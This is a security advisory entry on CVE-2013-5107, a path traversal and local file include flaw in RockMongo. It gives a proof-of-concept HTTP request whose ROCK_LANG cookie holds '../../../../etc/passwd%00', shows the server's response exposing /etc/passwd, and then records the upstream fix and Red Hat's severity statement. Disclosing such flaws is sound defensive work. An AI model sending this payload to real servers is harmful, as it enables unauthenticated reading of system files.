Damian Profancik of Trustwave SpiderLabs reports: RockMongo is vulnerable to a Local File Include and Path Traversal Vulnerability. Specifically, modifying the the ROCK_LANG cookie. This vulnerability does not require an attacker to be authenticated prior to performing the exploit. This is because the ROCK_LANG cookie is processed and included prior to logging in to the application. Below is a proof of concept for exploiting this vulnerability: Example 1 (Tested on RockMongo v1.1.2): #Request GET /index.php?action=login.index&host=0 HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: ROCK_LANG=../../../../etc/passwd%00 Connection: keep-alive #Response HTTP/1.1 200 OK Date: Mon, 10 Jun 2013 13:32:57 GMT Server: Apache/2.2.20 (Ubuntu) X-Powered-By: PHP/5.3.6-13ubuntu3.9 Set-Cookie: PHPSESSID=mla2qlmqa810h07qn6bie8qk77; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 4897 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html;charset=utf-8"/> <title>RockMongo</title> <script language="javascript" src="js/jquery-1.4.2.min.js"></script> <script language="javascript" src="js/jquery.textarea.js"></script> <link rel="stylesheet" href="themes/default/css/global.css" type="text/css" media="all"/> <script language="javascript"> $(function () { $(document).click(window.parent.hideMenus); if ($("textarea").length > 0) { $("textarea").tabby(); } }); </script> </head> <body>root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:103::/home/syslog:/bin/false messagebus:x:102:105::/var/run/dbus:/bin/false landscape:x:103:108::/var/lib/landscape:/bin/false sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin statd:x:105:65534::/var/lib/nfs:/bin/false postfix:x:106:114::/var/spool/postfix:/bin/false ntop:x:107:116::/var/lib/ntop:/bin/false mongodb:x:108:65534::/home/mongodb:/bin/false mysql:x:109:118:MySQL Server,,,:/nonexistent:/bin/false ntp:x:110:119::/home/ntp:/bin/false +:::::: <script type="text/javascript"> var showMore = 0; ... External references: https://www.trustwave.com/spiderlabs/advisories/TWSL2013-026.txt http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5107
This was fixed upstream: http://rockmongo.com/wiki/changeLog v1.1.6 - 2014-06-05 Fixed cookie vulnerability as reported in CVE-2013-5107 (thanks for synthomat)
Statement: This issue affects the versions of the mongo cartridge as shipped with Red Hat OpenShift Enterprise Linux 2. Red Hat Product Security has rated this issue as having Low security impact. A future update may address this issue. For additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/. Additionally OpenShift uses a strong file permission and SELinux permission model minimizing the amount of data that can be viewed.